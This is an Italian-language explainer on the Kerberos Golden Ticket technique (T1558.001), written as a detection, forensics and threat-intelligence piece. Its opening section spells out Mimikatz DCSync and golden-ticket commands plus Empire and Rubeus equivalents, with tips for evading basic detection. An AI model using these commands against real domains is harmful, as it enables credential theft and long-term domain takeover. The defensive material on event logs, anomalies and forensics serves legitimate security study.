Golden Ticket: Kerberos Ticket-Granting Ticket (T1558.001)

La generazione di un Golden Ticket richiede prima l'ottenimento dell'hash KRBTGT attraverso tecniche di credential dumping su un domain controller. Mimikatz rimane lo strumento principe per questa operazione.

Per estrarre l'hash KRBTGT dal domain controller compromesso: mimikatz # lsadump::dcsync /domain:victim.local /user:krbtgt

L'output fornirà l'hash NTLM necessario per la fase successiva. Con questo hash, puoi generare il Golden Ticket utilizzando il modulo kerberos di Mimikatz: mimikatz # kerberos::golden /domain:victim.local /sid:S-1-5-21-[...] /krbtgt:[HASH] /user:Administrator /id:500

Empire offre un'implementazione automatizzata attraverso il suo modulo Mimikatz integrato. La sintassi risulta più semplice per operazioni ripetute durante un red team engagement.

usemodule credentials/mimikatz/golden_ticket set Domain victim.local set CredID [ID] execute

Per ambienti Linux o cross-platform, Sliver incorpora il framework Rubeus permettendo manipolazioni avanzate dei ticket. La generazione avviene con: /rubeus golden /aes256:[HASH] /user:Administrator /domain:victim.local

Rubeus stesso offre opzioni granulari per personalizzare attributi del ticket come durata, SID history e gruppi. Questo permette di creare ticket più credibili che bypassano detection basiche: Rubeus.exe golden /rc4:[HASH] /domain:victim.local /sid:S-1-5-21-[...] /user:ServiceAccount /id:1105 /pgid:513 /groups:512,520,572

Una volta generato, il ticket viene iniettato nella sessione corrente permettendo l'accesso a qualsiasi risorsa del dominio. La persistenza può durare fino a 10 anni se non vengono implementate rotazioni dell'account KRBTGT.

La detection DET0144 fornisce indicatori comportamentali specifici per identificare Golden Ticket in uso. Il monitoraggio deve focalizzarsi su anomalie nei pattern Kerberos piuttosto che su singoli eventi.

I log critici risiedono in WinEventLog:Security e richiedono l'abilitazione dell'auditing avanzato Kerberos. Eventi chiave includono EventCode 4768 (richieste TGT) e 4769 (richieste TGS) con parametri sospetti.

Un Golden Ticket spesso presenta lifetime eccezionali rispetto alla policy del dominio. Se il dominio imposta TGT a 10 ore, un ticket di 10 anni rappresenta un'anomalia evidente. Configura il parametro TicketLifetimeThreshold basandoti sulla tua policy specifica.

L'uso di encryption types obsoleti come RC4 in domini moderni segnala possibili forgery. Il parametro AllowedEncryptionTypes deve riflettere solo gli algoritmi effettivamente in uso nell'ambiente. Un alert su RC4 in un dominio AES-only ha alta affidabilità.

Pattern di accesso anomali emergono quando un singolo ticket accede a risorse multiple senza precedenti TGT request. Un utente che accede simultaneamente a 50 server senza mai richiedere un nuovo TGT viola il normale flusso Kerberos.

Il monitoraggio dei processi che accedono a lsass.exe attraverso Sysmon fornisce contesto aggiuntivo. Il parametro ProcessAllowlist deve contenere solo processi legittimi del sistema. Accessi da PowerShell o tool sconosciuti meritano investigazione immediata.

La correlazione tra eventi diventa cruciale. Un singolo evento 4769 potrebbe essere legittimo, ma 100 eventi in 5 minuti dallo stesso ticket suggeriscono lateral movement con Golden Ticket.

L'analisi forense di un Golden Ticket richiede la ricostruzione della catena di compromissione che ha portato all'hash KRBTGT. Gli artefatti si distribuiscono tra domain controller e workstation compromesse.

Sul domain controller, esamina System e Security event logs per identificare quando è avvenuto il credential dumping. Eventi di accesso privilegiato a lsass.exe precedono tipicamente l'estrazione dell'hash. La presenza di tool come Mimikatz lascia tracce in prefetch e registry.

I Kerberos ticket cached sulle workstation (*%USERPROFILE%\AppData\Local*) possono contenere Golden Ticket ancora validi. L'analisi dei metadata rivela timestamp e durate anomale rispetto ai ticket legittimi.

La USN journal sui domain controller registra modifiche al database Active Directory. Anche se il Golden Ticket non modifica AD direttamente, l'accesso risultante a risorse protette genera entry correlabili.

Memory forensics attraverso volatility può recuperare ticket Kerberos dalla memoria di lsass.exe. I Golden Ticket presentano spesso campi malformati o valori default che li distinguono da ticket legittimi generati dal KDC.

L'attribuzione al gruppo Ke3chang deriva dall'analisi di campagne dove Mimikatz veniva deployato specificamente per Golden Ticket generation. I pattern di utilizzo e le risorse target permettono di collegare l'attività a specifici threat actor.

La timeline reconstruction deve mappare: compromissione iniziale → escalation a domain admin → dumping KRBTGT → generazione Golden Ticket → lateral movement. Ogni fase lascia artefatti forensi correlabili per ricostruire l'intera catena d'attacco.

Ke3chang rappresenta l'unico gruppo APT con utilizzo documentato di Golden Ticket secondo i dati disponibili. Questo gruppo, attivo dal 2010, mostra preferenza per tool pubblici come Mimikatz piuttosto che sviluppi custom.

Il profilo operativo di Ke3chang evidenzia targeting sistematico di organizzazioni governative e think tank. L'uso di Golden Ticket si inserisce in campagne di lunga durata dove la persistenza rappresenta l'obiettivo primario.

L'adozione limitata della tecnica (solo 1 gruppo su migliaia tracciati) suggerisce barriere tecniche o preferenze operative. Golden Ticket richiede compromissione completa del dominio, limitandone l'applicabilità a fasi avanzate dell'intrusione.

L'ecosistema software mostra convergenza su 4 tool principali: Mimikatz domina con implementazione matura, mentre Empire, Sliver e Rubeus offrono integrazioni moderne. La disponibilità pubblica di questi strumenti abbassa la barriera d'ingresso per attori meno sofisticati.

Pattern geografici e di targeting per Ke3chang mostrano focus su Asia-Pacifico con espansioni occasionali verso target occidentali di interesse strategico. La prossima evoluzione potrebbe includere Golden Ticket con attributi più sofisticati per evadere detection comportamentali.

L'assenza di campagne nominate specificamente per Golden Ticket suggerisce che la tecnica viene impiegata come componente di operazioni più ampie piuttosto che come focus primario. Threat hunter dovrebbero correlarla con altre tecniche di persistence e lateral movement.

Tecnica documentata nel framework MITRE ATT&CK come T1558.001. Utilizzo confermato dal gruppo Ke3chang. Implementazioni disponibili in Mimikatz, Empire, Sliver e Rubeus. Detection patterns basati su DET0144 per anomalie Kerberos.